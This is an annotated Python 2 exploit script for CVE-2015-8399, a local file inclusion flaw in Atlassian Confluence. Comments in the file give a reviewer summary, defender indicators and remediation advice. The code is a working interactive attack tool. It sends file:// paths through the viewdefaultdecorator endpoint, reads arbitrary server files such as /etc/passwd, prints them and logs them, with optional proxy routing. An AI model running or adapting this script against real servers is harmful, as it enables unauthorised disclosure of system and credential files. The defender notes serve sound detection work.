#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Exploit Title: Atlassian Confluence LFI Exploit
# Date: 05-11-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence/download
# Version: 5.2, 5.8.14, 5.8.15
# Tested on: Linux (Debian, CentOS), Windows 2008R2
# CVE : CVE-2015-8399
#
# Reviewer summary: Python 2 script (print statements, raw_input). It reads a
# filesystem path from an interactive prompt, requests
# spaces/viewdefaultdecorator.action with decoratorName=file://<path>, prints
# the text found between the <code> tags of the response and appends it to a
# dated log file next to the script.
# Defender notes: the indicator in web-server and proxy logs is a request to
# viewdefaultdecorator.action whose decoratorName value starts with "file://".
# Remediation is upgrading Confluence to a release in which the vendor has
# fixed CVE-2015-8399.

# hashlib, base64, socks and pprint are not referenced anywhere in this listing.
import sys, os, hashlib, base64, requests, socks, codecs
# Importing readline gives raw_input() line editing and history.
import readline
from pprint import pprint
from datetime import datetime
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences the warning urllib3 would otherwise print for every request,
# because certificate verification is switched off below (s.verify = False).
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

### Target  settings
# Placeholder base URL. It is concatenated directly with the endpoint path,
# so the trailing slash is required.
victim = 'http://victim.org/' ### Set victim host

### Proxy settings

HTTP_PROXY_ENABLED = 0 # If need to activate, set 1
# Placeholder proxy URLs; only applied to the session when HTTP_PROXY_ENABLED == 1.
proxies = {'http': 'http://login:password@host:port/', 'https': 'https://login:password@host:port/'} ### HTTP-proxy

### Set headers

# One shared session is used for every request the script makes.
s = requests.Session()
# Fixed header set: a hard-coded Chrome 51 User-Agent, a form Content-Type and
# X-Requested-With. The same three values accompany every request, which makes
# the combination usable as a log signature for this script.
s.headers.update({'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'})
s.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
s.headers.update({'X-Requested-With':'XMLHttpRequest'})
# TLS certificate verification is disabled for all requests on this session,
# including the api.ipify.org lookup in get_my_ip().
s.verify= False

### Logging all output commands

# Log path: the script's own directory, file name log_DD_MM_YYYY.txt (one file
# per day, computed once at start-up). The file ends up holding copies of
# whatever server-side content was returned, so treat it as sensitive data.
LOGFILE = os.path.realpath(os.path.dirname(__file__ )) + '/log_' + datetime.strftime(datetime.now(), "%d_%m_%Y") + '.txt'

# Usage banner. \033[96m ... \033[0m are ANSI colour escape sequences.
print ' \033[96m[!]\033[0m For getting file, read_file$/etc/passwd'
print ' \033[96m[!]\033[0m For directory listening, read_file$/etc'

def get_my_ip():
    """Return the public IP address reported by https://api.ipify.org.

    The request goes through the shared session ``s``, so it carries the same
    headers, proxy setting and disabled certificate verification as every
    other request. The function loops until a 200 response arrives; a non-200
    response is retried immediately, with no delay and no retry limit.
    """
    while True:
        try:
            r = s.get('https://api.ipify.org')
            # A requests Response is falsy for 4xx/5xx statuses, so the outer
            # test already rejects error responses before the explicit check.
            if r:
                if r.status_code == 200:
                    return r.text
        except requests.ConnectionError:
            print ' [-] ConnectionError'
            # NOTE(review): `time` is not among the imports in this listing, so
            # this line raises NameError instead of pausing for 20 seconds.
            time.sleep(20)

# Runs at import time, before main(): when the proxy flag is set, every request
# on the shared session is routed through `proxies`, and the address that
# api.ipify.org reports (presumably the proxy's egress address) is printed.
if HTTP_PROXY_ENABLED == 1:
    s.proxies = proxies
    print ' \033[96m[+]\033[0m Proxy server activated: ' + get_my_ip()

def loger(cmd, data):
    """Append one prompt entry and its result to the daily log file.

    cmd:  the path string typed at the prompt.
    data: the text extracted from the server response for that path.

    Each record is written as 'read_file$ <cmd>' followed by the data, so the
    log is a full transcript of the session, including retrieved file contents.
    """
    # Append mode, UTF-8. There is no try/finally or `with`, so the handle is
    # closed only when write() succeeds.
    f = codecs.open(LOGFILE, encoding='utf-8', mode='a')
    f.write('read_file$ %s\n%s\n' % (cmd, data))
    f.close()

def reader(url):
    """Request one path through the decorator endpoint and return the <code> text.

    Despite its name, `url` is a filesystem path. It is appended unencoded to
    'file://' in the decoratorName query parameter of
    spaces/viewdefaultdecorator.action on the configured host.

    Returns the slice of the response body between the first "<code>" and the
    last "</code>".

    Defender note: a decoratorName value beginning with "file://" on this
    endpoint is the request pattern to alert on or block at a reverse proxy
    or WAF until the server is upgraded.
    """
    ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
    start_tag = ans.find("<code>")
    end_tag = ans.rfind("</code>")
    # 6 == len("<code>"). If either tag is missing, find/rfind return -1 and the
    # slice becomes ans[5:...] / ans[...:-1], i.e. a chunk of the raw page is
    # returned rather than an empty string.
    data = ans[start_tag + 6    : end_tag ]
    return data

def main():
    """Interactive loop: prompt for a path, fetch it, print it and log it.

    The loop ends when the user types "quit"; that check runs only after the
    request and the log write for the same input have already happened.
    """
    while 1:
        path = raw_input('\033[96mread_file$ \033[0m')
        # `url` is the literal string "+ path +", not the value typed above.
        url = "+ path +"
        # This response is discarded: `ans` is reassigned on the next line. The
        # effect is that every prompt entry produces two requests, the first
        # always with decoratorName=file://+ path + -- a constant string that
        # identifies this script in server access logs.
        ans = s.get(''+ victim +'spaces/viewdefaultdecorator.action?decoratorName=file://' + url + '').content
        # The server output uses <br/> as line separator; convert to newlines.
        ans = reader(path).replace("<br/>", "\n")
        print ans
        loger(path, ans)
        # Both checks come after the fetch, so "quit" and the empty string are
        # themselves sent to the server and written to the log first.
        if path == "quit" : break
        if path == "" : print "Not found!"

# Entry point. Ctrl-C leaves the prompt loop and still prints the farewell;
# sys.exc_clear() exists only in Python 2.
if __name__ == '__main__':
    try:
        try:
            main()
        except KeyboardInterrupt:
            sys.exc_clear()
        print 'Goodbye! =)'
    except Exception:
        # Any other exception from main() (network errors, log write failures)
        # is discarded without a message, and the farewell is not printed.
        pass